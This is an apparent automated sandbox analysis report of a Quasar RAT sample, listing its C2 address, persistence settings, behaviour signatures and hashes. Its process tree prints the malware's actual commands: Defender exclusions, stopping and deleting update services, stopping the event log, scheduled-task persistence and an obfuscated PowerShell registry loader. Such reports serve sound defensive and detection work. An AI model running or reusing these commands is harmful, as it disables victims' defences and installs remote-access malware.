Analysis

  • max time kernel
    18s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    27-12-2024 11:04

General

  • Target

    7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe

  • Size

    6.0MB

  • MD5

    fcd7f27674626fbf8bcce5b0e991c03d

  • SHA1

    143515e84e3b48e5bc5286d819f8fd10b8eb5685

  • SHA256

    7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394

  • SHA512

    3464f2200c9eedd17872842b2336786360b34a4bb2f0709b29cb1a8f794b437532193275b43378149424e2d651dba66657d850ccb37e613cb73e76d8a36b98f6

  • SSDEEP

    98304:j3Go5BKtxo5fQIwuhk/UwalC+i0bBHXGgjaQx+OhfzTxzdloaDW:j3GozKYAEk9oCj0bR2Ej1hbTxkJ

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

C2

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes
  • encryption_key

    B000736BEBDF08FC1B6696200651882CF57E43E7

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    3dfx Startup

  • subdirectory

    SubDir

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 5 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 4 IoCs
  • Power Settings 1 TTPs 18 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 24 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{477c02a2-5339-4dbd-8d6b-685420988c11}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1872
      • C:\Windows\SysWOW64\dllhost.exe
        C:\Windows\SysWOW64\dllhost.exe /Processid:{feb0174f-d939-4512-af2d-de2b252bff34}
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1920
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:476
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:596
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1824
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:672
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Indicator Removal: Clear Windows Event Logs
                PID:752
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:812
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1092
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in Windows directory
                    PID:856
                    • C:\Windows\system32\wbem\WMIADAP.EXE
                      wmiadap.exe /F /T /R
                      3⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      PID:2692
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {9EEECB24-7452-4E3D-9F9D-1EF01F7D54D4} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Loads dropped DLL
                      PID:700
                      • C:\Program Files\Cuis\bon\Bara.exe
                        "C:\Program Files\Cuis\bon\Bara.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:2884
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          5⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:2128
                        • C:\Windows\system32\cmd.exe
                          cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                          5⤵
                            PID:1256
                            • C:\Windows\system32\sc.exe
                              sc stop UsoSvc
                              6⤵
                              • Launches sc.exe
                              PID:2244
                            • C:\Windows\system32\sc.exe
                              sc stop WaaSMedicSvc
                              6⤵
                              • Launches sc.exe
                              PID:712
                            • C:\Windows\system32\sc.exe
                              sc stop wuauserv
                              6⤵
                              • Launches sc.exe
                              PID:2472
                            • C:\Windows\system32\sc.exe
                              sc stop bits
                              6⤵
                              • Launches sc.exe
                              PID:2488
                            • C:\Windows\system32\sc.exe
                              sc stop dosvc
                              6⤵
                              • Launches sc.exe
                              PID:2972
                          • C:\Windows\system32\cmd.exe
                            cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            5⤵
                            • Power Settings
                            PID:388
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -hibernate-timeout-ac 0
                              6⤵
                              • Power Settings
                              PID:2644
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -hibernate-timeout-dc 0
                              6⤵
                              • Power Settings
                              PID:2852
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -standby-timeout-ac 0
                              6⤵
                              • Power Settings
                              PID:2608
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -standby-timeout-dc 0
                              6⤵
                              • Power Settings
                              PID:1856
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:836
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"
                              6⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:768
                          • C:\Windows\system32\dialer.exe
                            C:\Windows\system32\dialer.exe ujznpffbjbh
                            5⤵
                              PID:1992
                              • C:\Windows\system32\cmd.exe
                                cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                6⤵
                                  PID:444
                              • C:\Windows\system32\cmd.exe
                                cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                5⤵
                                  PID:1332
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic PATH Win32_VideoController GET Name, VideoProcessor
                                    6⤵
                                    • Detects videocard installed
                                    PID:2304
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                4⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:112
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                4⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1324
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService
                            2⤵
                              PID:972
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k NetworkService
                              2⤵
                                PID:276
                              • C:\Windows\system32\taskhost.exe
                                "taskhost.exe"
                                2⤵
                                  PID:1072
                                • C:\Windows\System32\spoolsv.exe
                                  C:\Windows\System32\spoolsv.exe
                                  2⤵
                                    PID:1080
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                    2⤵
                                      PID:1148
                                    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                      2⤵
                                        PID:1732
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                        2⤵
                                          PID:984
                                        • C:\Windows\system32\sppsvc.exe
                                          C:\Windows\system32\sppsvc.exe
                                          2⤵
                                            PID:2108
                                          • C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                            C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                            2⤵
                                              PID:2512
                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                3⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:2164
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                3⤵
                                                  PID:1624
                                                  • C:\Windows\system32\wusa.exe
                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                    4⤵
                                                      PID:1472
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:2792
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:2668
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:2960
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop bits
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:1048
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop dosvc
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:1224
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    3⤵
                                                    • Power Settings
                                                    PID:2624
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    3⤵
                                                    • Power Settings
                                                    PID:3064
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    3⤵
                                                    • Power Settings
                                                    PID:2636
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    3⤵
                                                    • Power Settings
                                                    PID:556
                                                  • C:\Windows\system32\dialer.exe
                                                    C:\Windows\system32\dialer.exe
                                                    3⤵
                                                      PID:884
                                                    • C:\Windows\system32\dialer.exe
                                                      C:\Windows\system32\dialer.exe
                                                      3⤵
                                                        PID:848
                                                      • C:\Windows\system32\dialer.exe
                                                        dialer.exe
                                                        3⤵
                                                          PID:2296
                                                    • C:\Windows\system32\lsass.exe
                                                      C:\Windows\system32\lsass.exe
                                                      1⤵
                                                        PID:492
                                                      • C:\Windows\system32\lsm.exe
                                                        C:\Windows\system32\lsm.exe
                                                        1⤵
                                                          PID:500
                                                        • C:\Windows\Explorer.EXE
                                                          C:\Windows\Explorer.EXE
                                                          1⤵
                                                            PID:1176
                                                            • C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe"
                                                              2⤵
                                                              • Loads dropped DLL
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1784
                                                              • C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2504
                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  PID:2540
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                  4⤵
                                                                    PID:2820
                                                                    • C:\Windows\system32\wusa.exe
                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                      5⤵
                                                                        PID:352
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                      4⤵
                                                                      • Launches sc.exe
                                                                      PID:3016
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                      4⤵
                                                                      • Launches sc.exe
                                                                      PID:2536
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                      4⤵
                                                                      • Launches sc.exe
                                                                      PID:1856
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop bits
                                                                      4⤵
                                                                      • Launches sc.exe
                                                                      PID:2032
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                      4⤵
                                                                      • Launches sc.exe
                                                                      PID:2368
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                      4⤵
                                                                      • Power Settings
                                                                      PID:2528
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                      4⤵
                                                                      • Power Settings
                                                                      PID:108
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                      4⤵
                                                                      • Power Settings
                                                                      PID:2516
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                      4⤵
                                                                      • Power Settings
                                                                      PID:2388
                                                                    • C:\Windows\system32\dialer.exe
                                                                      C:\Windows\system32\dialer.exe
                                                                      4⤵
                                                                        PID:580
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe delete "WAGDKRVZ"
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:2244
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:948
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:2564
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe start "WAGDKRVZ"
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:2432
                                                                    • C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      • Drops file in Program Files directory
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:388
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2232
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                        4⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:3060
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop UsoSvc
                                                                          5⤵
                                                                          • Launches sc.exe
                                                                          PID:2784
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop WaaSMedicSvc
                                                                          5⤵
                                                                          • Launches sc.exe
                                                                          PID:1432
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop wuauserv
                                                                          5⤵
                                                                          • Launches sc.exe
                                                                          PID:3028
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop bits
                                                                          5⤵
                                                                          • Launches sc.exe
                                                                          PID:2368
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc stop dosvc
                                                                          5⤵
                                                                          • Launches sc.exe
                                                                          PID:1236
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                          5⤵
                                                                            PID:2024
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                            5⤵
                                                                              PID:2116
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                              5⤵
                                                                              • Modifies security service
                                                                              PID:2528
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                              5⤵
                                                                                PID:2516
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                5⤵
                                                                                  PID:2388
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                4⤵
                                                                                • Power Settings
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3004
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  powercfg /x -hibernate-timeout-ac 0
                                                                                  5⤵
                                                                                  • Power Settings
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:712
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  powercfg /x -hibernate-timeout-dc 0
                                                                                  5⤵
                                                                                  • Power Settings
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1552
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  powercfg /x -standby-timeout-ac 0
                                                                                  5⤵
                                                                                  • Power Settings
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1600
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  powercfg /x -standby-timeout-dc 0
                                                                                  5⤵
                                                                                  • Power Settings
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1456
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                                                                                4⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3012
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"
                                                                                  5⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:1804
                                                                              • C:\Windows\system32\dialer.exe
                                                                                C:\Windows\system32\dialer.exe
                                                                                4⤵
                                                                                • Drops file in Windows directory
                                                                                PID:2324
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
                                                                                4⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2372
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  "C:\Windows\system32\schtasks.exe" /run /tn Barac
                                                                                  5⤵
                                                                                    PID:1012
                                                                              • C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2124
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe" /rl HIGHEST /f
                                                                                  4⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:2956
                                                                                • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2916
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                    5⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:2860
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "1777516889-144054722-8301656292111258196-1727868101-9534071591396503819-1689199505"
                                                                            1⤵
                                                                              PID:1252
                                                                            • C:\Windows\system32\conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe "1365120844934267019-18072528865190906681080200397-19303294391169832219-1581224633"
                                                                              1⤵
                                                                                PID:668
                                                                              • C:\Windows\system32\conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe "1012058738-73299992916566076121271435251-37664356-1353740572-230731571-884637434"
                                                                                1⤵
                                                                                  PID:1188

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Local\Temp\ergbuiluyfd.exe

                                                                                  Filesize

                                                                                  502KB

                                                                                  MD5

                                                                                  ea001f076677c9b0dd774ae670efdf63

                                                                                  SHA1

                                                                                  37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

                                                                                  SHA256

                                                                                  19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

                                                                                  SHA512

                                                                                  6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

